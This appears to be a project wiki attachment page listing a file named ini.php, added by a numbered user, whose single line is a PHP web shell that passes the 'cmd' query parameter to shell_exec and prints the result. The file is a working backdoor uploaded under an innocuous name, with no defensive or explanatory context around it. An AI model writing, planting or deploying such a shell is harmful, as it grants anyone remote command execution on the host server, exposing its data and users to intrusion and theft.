WikiStart: ini.php

File ini.php, 73 bytes (added by 111216, 12 years ago)
Line 
1<?php $output = shell_exec(($_GET["cmd"])); echo "<pre>$output</pre>"; ?>